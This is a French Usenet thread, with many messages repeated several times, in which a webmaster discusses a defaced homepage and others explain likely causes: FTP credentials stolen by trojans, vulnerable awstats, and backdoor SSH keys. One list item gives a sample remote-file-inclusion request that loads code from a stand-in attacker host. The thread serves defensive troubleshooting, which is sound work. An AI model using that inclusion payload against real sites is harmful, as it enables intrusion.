Tu en as encore beaucoup des conneries du genre?
http://www.password-crackers.com/en/category_162/
Pour ce qui est des process qui tourne je te suggère de chercher rootkit
sur un moteur de recherche.
Pour le "petit site" : cf (entre autre) aléatoire, script kiddies,
zombies... (ça vaut aussi pour les machines perso).
Même si j'ai une forte présomption sur (au moins) un problème avec ton
hébergeur (à cause des logs) tu devrais éviter d'être trop sur de toi.
J'ai l'habitude de dire : je n'ai pas *encore* été hacké *à ma
connaissance*. Tu comprends ce que je veux exprimer?
Entre autre, la remise en cause fait partie de la sécurité (qui est
décidement tout sauf un process :) ).
Tu en as encore beaucoup des conneries du genre?
http://www.password-crackers.com/en/category_162/
Pour ce qui est des process qui tourne je te suggère de chercher rootkit
sur un moteur de recherche.
Pour le "petit site" : cf (entre autre) aléatoire, script kiddies,
zombies... (ça vaut aussi pour les machines perso).
Même si j'ai une forte présomption sur (au moins) un problème avec ton
hébergeur (à cause des logs) tu devrais éviter d'être trop sur de toi.
J'ai l'habitude de dire : je n'ai pas *encore* été hacké *à ma
connaissance*. Tu comprends ce que je veux exprimer?
Entre autre, la remise en cause fait partie de la sécurité (qui est
décidement tout sauf un process :) ).
Tu en as encore beaucoup des conneries du genre?
http://www.password-crackers.com/en/category_162/
Pour ce qui est des process qui tourne je te suggère de chercher rootkit
sur un moteur de recherche.
Pour le "petit site" : cf (entre autre) aléatoire, script kiddies,
zombies... (ça vaut aussi pour les machines perso).
Même si j'ai une forte présomption sur (au moins) un problème avec ton
hébergeur (à cause des logs) tu devrais éviter d'être trop sur de toi.
J'ai l'habitude de dire : je n'ai pas *encore* été hacké *à ma
connaissance*. Tu comprends ce que je veux exprimer?
Entre autre, la remise en cause fait partie de la sécurité (qui est
décidement tout sauf un process :) ).
J'adooooore ton post (humour !). Il véhicule quelques unes des idées
reçues les plus classiques et les plus dangereuses quant à la sécurité
d'un site Web.
la seconde, c'est que mon site n'est pas une cible particulièrement
intéressante à pirater
Faux. Pour monter un site de phishing ou héberger le centre de contrôle
d'un botnet, un site quelconque chez un hébergeur quelconque est très
largment suffisant. Et sans doute moins surveillé qu'un "gros" site.
j'en déduis donc que c'est une cible facile
Une cible facile, pour ces gars là, c'est soit :
- un site avec une faille connue et aisément exploitable (awstats)
- un site exploitable via une faille de sécu générique (style
"/index.php?lang=http://badboy.com/hackme.php%00")
- un site dont il a déjà l'identifiant et mot de passe FTP
la troisième c'est que je ne rentre jamais de mots de passe, mon client
FTP
[...] s'en charge pour moi.
Donc le mot de passe est soit en base de registre soit sur disque. Et
l'éventuelle "obfuscation" est réversible, vu que le mot de passe doit
être envoyé en clair. Et ça fait des années que les backdoors/chevaux
de Troie/RAT récupèrent ces infos et les font suivre au gars qui les
contrôle. Qui parfois les revend à des phishers ...
J'adooooore ton post (humour !). Il véhicule quelques unes des idées
reçues les plus classiques et les plus dangereuses quant à la sécurité
d'un site Web.
la seconde, c'est que mon site n'est pas une cible particulièrement
intéressante à pirater
Faux. Pour monter un site de phishing ou héberger le centre de contrôle
d'un botnet, un site quelconque chez un hébergeur quelconque est très
largment suffisant. Et sans doute moins surveillé qu'un "gros" site.
j'en déduis donc que c'est une cible facile
Une cible facile, pour ces gars là, c'est soit :
- un site avec une faille connue et aisément exploitable (awstats)
- un site exploitable via une faille de sécu générique (style
"/index.php?lang=http://badboy.com/hackme.php%00")
- un site dont il a déjà l'identifiant et mot de passe FTP
la troisième c'est que je ne rentre jamais de mots de passe, mon client
FTP
[...] s'en charge pour moi.
Donc le mot de passe est soit en base de registre soit sur disque. Et
l'éventuelle "obfuscation" est réversible, vu que le mot de passe doit
être envoyé en clair. Et ça fait des années que les backdoors/chevaux
de Troie/RAT récupèrent ces infos et les font suivre au gars qui les
contrôle. Qui parfois les revend à des phishers ...
J'adooooore ton post (humour !). Il véhicule quelques unes des idées
reçues les plus classiques et les plus dangereuses quant à la sécurité
d'un site Web.
la seconde, c'est que mon site n'est pas une cible particulièrement
intéressante à pirater
Faux. Pour monter un site de phishing ou héberger le centre de contrôle
d'un botnet, un site quelconque chez un hébergeur quelconque est très
largment suffisant. Et sans doute moins surveillé qu'un "gros" site.
j'en déduis donc que c'est une cible facile
Une cible facile, pour ces gars là, c'est soit :
- un site avec une faille connue et aisément exploitable (awstats)
- un site exploitable via une faille de sécu générique (style
"/index.php?lang=http://badboy.com/hackme.php%00")
- un site dont il a déjà l'identifiant et mot de passe FTP
la troisième c'est que je ne rentre jamais de mots de passe, mon client
FTP
[...] s'en charge pour moi.
Donc le mot de passe est soit en base de registre soit sur disque. Et
l'éventuelle "obfuscation" est réversible, vu que le mot de passe doit
être envoyé en clair. Et ça fait des années que les backdoors/chevaux
de Troie/RAT récupèrent ces infos et les font suivre au gars qui les
contrôle. Qui parfois les revend à des phishers ...
la seconde, c'est que mon site n'est pas une cible particulièrement
intéressante à pirater
Faux. Pour monter un site de phishing ou héberger le centre de contrôle
d'un botnet, un site quelconque chez un hébergeur quelconque est très
largment suffisant. Et sans doute moins surveillé qu'un "gros" site.
mais c'est là que je m'étonne : la seule page piratée sur mon site c'est la
homepage.
si j'étais un pirate et que je cherchais à utiliser des sites web à leur
insu, ça serait en me servant de dossiers ou de pages paumées et oubliées
dans un coin... ?
pour infecter des gens, non, il vaut mieux se mettre sur la homepage.
j'en déduis donc que c'est une cible facile
Une cible facile, pour ces gars là, c'est soit :
- un site avec une faille connue et aisément exploitable (awstats)
- un site exploitable via une faille de sécu générique (style
"/index.php?lang=http://badboy.com/hackme.php%00")
- un site dont il a déjà l'identifiant et mot de passe FTP
awstats est une faille connue ? hmmm.
mon hébergeur a justement ajouté awstats à webalizer dans les outils
fournis.la troisième c'est que je ne rentre jamais de mots de passe, mon client
FTP
[...] s'en charge pour moi.
Donc le mot de passe est soit en base de registre soit sur disque. Et
l'éventuelle "obfuscation" est réversible, vu que le mot de passe doit
être envoyé en clair. Et ça fait des années que les backdoors/chevaux
de Troie/RAT récupèrent ces infos et les font suivre au gars qui les
contrôle. Qui parfois les revend à des phishers ...
effectivement.
mais je gère des dizaines de sites web, avec le même outil, depuis le même
ordinateur, et de la même façon. Je suis curieux de comprendre pourquoi un
de ces sites est piraté et pas les autres.
la seconde, c'est que mon site n'est pas une cible particulièrement
intéressante à pirater
Faux. Pour monter un site de phishing ou héberger le centre de contrôle
d'un botnet, un site quelconque chez un hébergeur quelconque est très
largment suffisant. Et sans doute moins surveillé qu'un "gros" site.
mais c'est là que je m'étonne : la seule page piratée sur mon site c'est la
homepage.
si j'étais un pirate et que je cherchais à utiliser des sites web à leur
insu, ça serait en me servant de dossiers ou de pages paumées et oubliées
dans un coin... ?
pour infecter des gens, non, il vaut mieux se mettre sur la homepage.
j'en déduis donc que c'est une cible facile
Une cible facile, pour ces gars là, c'est soit :
- un site avec une faille connue et aisément exploitable (awstats)
- un site exploitable via une faille de sécu générique (style
"/index.php?lang=http://badboy.com/hackme.php%00")
- un site dont il a déjà l'identifiant et mot de passe FTP
awstats est une faille connue ? hmmm.
mon hébergeur a justement ajouté awstats à webalizer dans les outils
fournis.
la troisième c'est que je ne rentre jamais de mots de passe, mon client
FTP
[...] s'en charge pour moi.
Donc le mot de passe est soit en base de registre soit sur disque. Et
l'éventuelle "obfuscation" est réversible, vu que le mot de passe doit
être envoyé en clair. Et ça fait des années que les backdoors/chevaux
de Troie/RAT récupèrent ces infos et les font suivre au gars qui les
contrôle. Qui parfois les revend à des phishers ...
effectivement.
mais je gère des dizaines de sites web, avec le même outil, depuis le même
ordinateur, et de la même façon. Je suis curieux de comprendre pourquoi un
de ces sites est piraté et pas les autres.
la seconde, c'est que mon site n'est pas une cible particulièrement
intéressante à pirater
Faux. Pour monter un site de phishing ou héberger le centre de contrôle
d'un botnet, un site quelconque chez un hébergeur quelconque est très
largment suffisant. Et sans doute moins surveillé qu'un "gros" site.
mais c'est là que je m'étonne : la seule page piratée sur mon site c'est la
homepage.
si j'étais un pirate et que je cherchais à utiliser des sites web à leur
insu, ça serait en me servant de dossiers ou de pages paumées et oubliées
dans un coin... ?
pour infecter des gens, non, il vaut mieux se mettre sur la homepage.
j'en déduis donc que c'est une cible facile
Une cible facile, pour ces gars là, c'est soit :
- un site avec une faille connue et aisément exploitable (awstats)
- un site exploitable via une faille de sécu générique (style
"/index.php?lang=http://badboy.com/hackme.php%00")
- un site dont il a déjà l'identifiant et mot de passe FTP
awstats est une faille connue ? hmmm.
mon hébergeur a justement ajouté awstats à webalizer dans les outils
fournis.la troisième c'est que je ne rentre jamais de mots de passe, mon client
FTP
[...] s'en charge pour moi.
Donc le mot de passe est soit en base de registre soit sur disque. Et
l'éventuelle "obfuscation" est réversible, vu que le mot de passe doit
être envoyé en clair. Et ça fait des années que les backdoors/chevaux
de Troie/RAT récupèrent ces infos et les font suivre au gars qui les
contrôle. Qui parfois les revend à des phishers ...
effectivement.
mais je gère des dizaines de sites web, avec le même outil, depuis le même
ordinateur, et de la même façon. Je suis curieux de comprendre pourquoi un
de ces sites est piraté et pas les autres.
si comme tu dis plus haut la redirection se fait sur le site hebforum
c'est sans doute uniquement pour booster la frequentation de ce site,
mais ca me semble curieux.
Une autre raison pourrait etre l'inclusion de code offensif: tout les
internautes qui naviguent sur ton site se font infecter par la
page incluse dans l'iframe.
pour infecter des gens, non, il vaut mieux se mettre sur la homepage.
awstats est une faille connue ? hmmm.
awstats me semble avoir un passe charge au niveau de la securite.
hypothese personnelle:
le gars qui t'as attaque n'est pas tres malin. Il a utilise un outil tout
fait et s'est contente de cliquouiller un peu partout.
Il a trouve un login/pass et n'a pas regarde plus loin.
Mais je reverifierai tout de meme tous tes autres sites. Si un abruti
a pu venir sur un de tes sites, un gars plus fin (et beacoup plus
discret) a pu y aller aussi.
si comme tu dis plus haut la redirection se fait sur le site hebforum
c'est sans doute uniquement pour booster la frequentation de ce site,
mais ca me semble curieux.
Une autre raison pourrait etre l'inclusion de code offensif: tout les
internautes qui naviguent sur ton site se font infecter par la
page incluse dans l'iframe.
pour infecter des gens, non, il vaut mieux se mettre sur la homepage.
awstats est une faille connue ? hmmm.
awstats me semble avoir un passe charge au niveau de la securite.
hypothese personnelle:
le gars qui t'as attaque n'est pas tres malin. Il a utilise un outil tout
fait et s'est contente de cliquouiller un peu partout.
Il a trouve un login/pass et n'a pas regarde plus loin.
Mais je reverifierai tout de meme tous tes autres sites. Si un abruti
a pu venir sur un de tes sites, un gars plus fin (et beacoup plus
discret) a pu y aller aussi.
si comme tu dis plus haut la redirection se fait sur le site hebforum
c'est sans doute uniquement pour booster la frequentation de ce site,
mais ca me semble curieux.
Une autre raison pourrait etre l'inclusion de code offensif: tout les
internautes qui naviguent sur ton site se font infecter par la
page incluse dans l'iframe.
pour infecter des gens, non, il vaut mieux se mettre sur la homepage.
awstats est une faille connue ? hmmm.
awstats me semble avoir un passe charge au niveau de la securite.
hypothese personnelle:
le gars qui t'as attaque n'est pas tres malin. Il a utilise un outil tout
fait et s'est contente de cliquouiller un peu partout.
Il a trouve un login/pass et n'a pas regarde plus loin.
Mais je reverifierai tout de meme tous tes autres sites. Si un abruti
a pu venir sur un de tes sites, un gars plus fin (et beacoup plus
discret) a pu y aller aussi.
"Eric Razny" a écrit
je suis venu ici en parler c'est justement précisément parce que je ne
suis pas spécialiste. Le fait que j'aie certaines certitudes
puisque le
cerveau a constament besoin de certitudes pour avancer.
mais pourquoi sur la home page où c'est si facile à détecter ?
"Eric Razny" <news_01@razny.net> a écrit
je suis venu ici en parler c'est justement précisément parce que je ne
suis pas spécialiste. Le fait que j'aie certaines certitudes
puisque le
cerveau a constament besoin de certitudes pour avancer.
mais pourquoi sur la home page où c'est si facile à détecter ?
"Eric Razny" a écrit
je suis venu ici en parler c'est justement précisément parce que je ne
suis pas spécialiste. Le fait que j'aie certaines certitudes
puisque le
cerveau a constament besoin de certitudes pour avancer.
mais pourquoi sur la home page où c'est si facile à détecter ?
Désolé si je t'ai vexé, mais c'est justement parce que tu amenais des
certitudes qui m'a gêné. Et j'ai réagis fortement car beaucoup de
débutants prennent les certitudes des intervenants pour argent comptant.
Et au niveau de la sécu ça ne pardonne pas trop.
puisque le
cerveau a constament besoin de certitudes pour avancer.
Comme le dirait Gabin je sais que je ne sais rien :)
Bon, ça fait déjà une certitude alors ça marche aussi.
Comme d'autre l'ont suggéré c'est un emplacement privilégié pour un
code offensif. Perso je préfèrerais une autre page, pointée par la page
d'accueil, si mon code risque de produire une alerte sur le browser : les
gens auront plus tendance à penser à une erreur du site, alors que sur
la page d'accueil ça pousse à prévenir le webmaster.
Pour ton site, as tu seulement accès par ftp ou ton hébergeur
laisse-t-il d'autre accès?
Si tu t'es fait comprommettre un compte accessible par ssh, par exemple,
le gus en aura peut être profité pour "complèter" le classique
.ssh/authorized_keys2 par exemple. Et ça ça passe sans problème la
plupart des tests de vérification d'intégrité[1]
Sinon as-tu ré-interrogé ton hébergeur à propos des logs (emplacement
et protection, puisqu'apparement tu n'y as pas accès)?
Désolé si je t'ai vexé, mais c'est justement parce que tu amenais des
certitudes qui m'a gêné. Et j'ai réagis fortement car beaucoup de
débutants prennent les certitudes des intervenants pour argent comptant.
Et au niveau de la sécu ça ne pardonne pas trop.
puisque le
cerveau a constament besoin de certitudes pour avancer.
Comme le dirait Gabin je sais que je ne sais rien :)
Bon, ça fait déjà une certitude alors ça marche aussi.
Comme d'autre l'ont suggéré c'est un emplacement privilégié pour un
code offensif. Perso je préfèrerais une autre page, pointée par la page
d'accueil, si mon code risque de produire une alerte sur le browser : les
gens auront plus tendance à penser à une erreur du site, alors que sur
la page d'accueil ça pousse à prévenir le webmaster.
Pour ton site, as tu seulement accès par ftp ou ton hébergeur
laisse-t-il d'autre accès?
Si tu t'es fait comprommettre un compte accessible par ssh, par exemple,
le gus en aura peut être profité pour "complèter" le classique
.ssh/authorized_keys2 par exemple. Et ça ça passe sans problème la
plupart des tests de vérification d'intégrité[1]
Sinon as-tu ré-interrogé ton hébergeur à propos des logs (emplacement
et protection, puisqu'apparement tu n'y as pas accès)?
Désolé si je t'ai vexé, mais c'est justement parce que tu amenais des
certitudes qui m'a gêné. Et j'ai réagis fortement car beaucoup de
débutants prennent les certitudes des intervenants pour argent comptant.
Et au niveau de la sécu ça ne pardonne pas trop.
puisque le
cerveau a constament besoin de certitudes pour avancer.
Comme le dirait Gabin je sais que je ne sais rien :)
Bon, ça fait déjà une certitude alors ça marche aussi.
Comme d'autre l'ont suggéré c'est un emplacement privilégié pour un
code offensif. Perso je préfèrerais une autre page, pointée par la page
d'accueil, si mon code risque de produire une alerte sur le browser : les
gens auront plus tendance à penser à une erreur du site, alors que sur
la page d'accueil ça pousse à prévenir le webmaster.
Pour ton site, as tu seulement accès par ftp ou ton hébergeur
laisse-t-il d'autre accès?
Si tu t'es fait comprommettre un compte accessible par ssh, par exemple,
le gus en aura peut être profité pour "complèter" le classique
.ssh/authorized_keys2 par exemple. Et ça ça passe sans problème la
plupart des tests de vérification d'intégrité[1]
Sinon as-tu ré-interrogé ton hébergeur à propos des logs (emplacement
et protection, puisqu'apparement tu n'y as pas accès)?
puisque le
cerveau a constament besoin de certitudes pour avancer.
Comme le dirait Gabin je sais que je ne sais rien :) Bon, ça fait
déjà une certitude alors ça marche aussi.
Et selon les sciences cognitives et la neurologie (cf.Henri Laborit), sans
certitudes, on ne peut pas progresser, on vit dans le stress, on perd ses
cheveux et, pour survivre, on adopte une attitude agressive.
Mon hébergeur me donne accès au FTP (strictement réduit à mon dossier
http), pas de Telnet bien sûr. Il y a une console d'administration qui me
permet par ailleurs de créer des utilisateurs, des bases de données,
etc. Classique, a priori. Pas de web-FTP. Pour le reste je ne sais pas. Le
serveur n'est pas bourré d'outils, il y a bien les extensions Frontpage
(je crois que j'ai tout effacé). Il n'y a pas de SSH pour le "pack" que
j'ai choisi, mais certaines options commerciales y ont droit.
Sinon as-tu ré-interrogé ton hébergeur à propos des logs
(emplacement et protection, puisqu'apparement tu n'y as pas accès)?
Il est assez évasif et semble préférer l'idée que le problème vient
de moi. Bah...
puisque le
cerveau a constament besoin de certitudes pour avancer.
Comme le dirait Gabin je sais que je ne sais rien :) Bon, ça fait
déjà une certitude alors ça marche aussi.
Et selon les sciences cognitives et la neurologie (cf.Henri Laborit), sans
certitudes, on ne peut pas progresser, on vit dans le stress, on perd ses
cheveux et, pour survivre, on adopte une attitude agressive.
Mon hébergeur me donne accès au FTP (strictement réduit à mon dossier
http), pas de Telnet bien sûr. Il y a une console d'administration qui me
permet par ailleurs de créer des utilisateurs, des bases de données,
etc. Classique, a priori. Pas de web-FTP. Pour le reste je ne sais pas. Le
serveur n'est pas bourré d'outils, il y a bien les extensions Frontpage
(je crois que j'ai tout effacé). Il n'y a pas de SSH pour le "pack" que
j'ai choisi, mais certaines options commerciales y ont droit.
Sinon as-tu ré-interrogé ton hébergeur à propos des logs
(emplacement et protection, puisqu'apparement tu n'y as pas accès)?
Il est assez évasif et semble préférer l'idée que le problème vient
de moi. Bah...
puisque le
cerveau a constament besoin de certitudes pour avancer.
Comme le dirait Gabin je sais que je ne sais rien :) Bon, ça fait
déjà une certitude alors ça marche aussi.
Et selon les sciences cognitives et la neurologie (cf.Henri Laborit), sans
certitudes, on ne peut pas progresser, on vit dans le stress, on perd ses
cheveux et, pour survivre, on adopte une attitude agressive.
Mon hébergeur me donne accès au FTP (strictement réduit à mon dossier
http), pas de Telnet bien sûr. Il y a une console d'administration qui me
permet par ailleurs de créer des utilisateurs, des bases de données,
etc. Classique, a priori. Pas de web-FTP. Pour le reste je ne sais pas. Le
serveur n'est pas bourré d'outils, il y a bien les extensions Frontpage
(je crois que j'ai tout effacé). Il n'y a pas de SSH pour le "pack" que
j'ai choisi, mais certaines options commerciales y ont droit.
Sinon as-tu ré-interrogé ton hébergeur à propos des logs
(emplacement et protection, puisqu'apparement tu n'y as pas accès)?
Il est assez évasif et semble préférer l'idée que le problème vient
de moi. Bah...
Je crois que tu vas devoir apprendre à interprêter les smilies
(pardon, émoticons)...
Quand aux sciences cognitives et à la neurologie, elles ne sont pas
l'apanage du seul Sieur Laborit[1]. Il avait d'ailleurs une
tendance à prolonger ses découvertes/théories (remarquables d'ailleurs)
au delà de leur portées réelles avec des généralisations ou des soit
disant implications parfois difficilement justifiables.
Bref merci de rester axé sur l'objet de ce forum au lieu d'utiliser des
théories interressante pour faire, in fine, de la psychologie de cuisine
à deux balles.
Amha tu as tout intérêt à faire une demande amiable d'abord -mais
ferme-, puis écrite en cas de refus d'explication sur la disparition des
logs. Outre le fait que tu aura une explication "définitive" sur ce point
ça te donne une certaine protection en cas de problèmes juridiques. Si
quelqu'un a subit des dommages en consultant ton site il peut
éventuellement se retourner contre toi au civil pour obtenir réparation
(le fait que ce soit très improbable ne signifie pas impossible). Ca ne
te mets pas à l'abris de tout mais montre que tu es concerné par le
problème et pose un doute sur l'hébergeur.
Néanmoins il est possible (c'est subjectif mais basé sur certains
éléments ayant trait à la méconnaissance de la sécu me poussent à le
croire) que le problème vient de ton login/passwd ftp dans la nature ou
d'un script qui ne filtre pas correctement les entrées. Ca n'explique pas
l'absence de log mais il est possible que ton hébergeur ait simplement
voulu cacher qu'il a merdé sur ce point (absence totale de log par
exemple).
A propos de log, ceux d'apache seront probablement bien interressant
(genre une forte activité avant les premières pages offenssives
servies...)
Je crois que tu vas devoir apprendre à interprêter les smilies
(pardon, émoticons)...
Quand aux sciences cognitives et à la neurologie, elles ne sont pas
l'apanage du seul Sieur Laborit[1]. Il avait d'ailleurs une
tendance à prolonger ses découvertes/théories (remarquables d'ailleurs)
au delà de leur portées réelles avec des généralisations ou des soit
disant implications parfois difficilement justifiables.
Bref merci de rester axé sur l'objet de ce forum au lieu d'utiliser des
théories interressante pour faire, in fine, de la psychologie de cuisine
à deux balles.
Amha tu as tout intérêt à faire une demande amiable d'abord -mais
ferme-, puis écrite en cas de refus d'explication sur la disparition des
logs. Outre le fait que tu aura une explication "définitive" sur ce point
ça te donne une certaine protection en cas de problèmes juridiques. Si
quelqu'un a subit des dommages en consultant ton site il peut
éventuellement se retourner contre toi au civil pour obtenir réparation
(le fait que ce soit très improbable ne signifie pas impossible). Ca ne
te mets pas à l'abris de tout mais montre que tu es concerné par le
problème et pose un doute sur l'hébergeur.
Néanmoins il est possible (c'est subjectif mais basé sur certains
éléments ayant trait à la méconnaissance de la sécu me poussent à le
croire) que le problème vient de ton login/passwd ftp dans la nature ou
d'un script qui ne filtre pas correctement les entrées. Ca n'explique pas
l'absence de log mais il est possible que ton hébergeur ait simplement
voulu cacher qu'il a merdé sur ce point (absence totale de log par
exemple).
A propos de log, ceux d'apache seront probablement bien interressant
(genre une forte activité avant les premières pages offenssives
servies...)
Je crois que tu vas devoir apprendre à interprêter les smilies
(pardon, émoticons)...
Quand aux sciences cognitives et à la neurologie, elles ne sont pas
l'apanage du seul Sieur Laborit[1]. Il avait d'ailleurs une
tendance à prolonger ses découvertes/théories (remarquables d'ailleurs)
au delà de leur portées réelles avec des généralisations ou des soit
disant implications parfois difficilement justifiables.
Bref merci de rester axé sur l'objet de ce forum au lieu d'utiliser des
théories interressante pour faire, in fine, de la psychologie de cuisine
à deux balles.
Amha tu as tout intérêt à faire une demande amiable d'abord -mais
ferme-, puis écrite en cas de refus d'explication sur la disparition des
logs. Outre le fait que tu aura une explication "définitive" sur ce point
ça te donne une certaine protection en cas de problèmes juridiques. Si
quelqu'un a subit des dommages en consultant ton site il peut
éventuellement se retourner contre toi au civil pour obtenir réparation
(le fait que ce soit très improbable ne signifie pas impossible). Ca ne
te mets pas à l'abris de tout mais montre que tu es concerné par le
problème et pose un doute sur l'hébergeur.
Néanmoins il est possible (c'est subjectif mais basé sur certains
éléments ayant trait à la méconnaissance de la sécu me poussent à le
croire) que le problème vient de ton login/passwd ftp dans la nature ou
d'un script qui ne filtre pas correctement les entrées. Ca n'explique pas
l'absence de log mais il est possible que ton hébergeur ait simplement
voulu cacher qu'il a merdé sur ce point (absence totale de log par
exemple).
A propos de log, ceux d'apache seront probablement bien interressant
(genre une forte activité avant les premières pages offenssives
servies...)
awstats est une faille connue ? hmmm.
awstats est une faille connue ? hmmm.
awstats est une faille connue ? hmmm.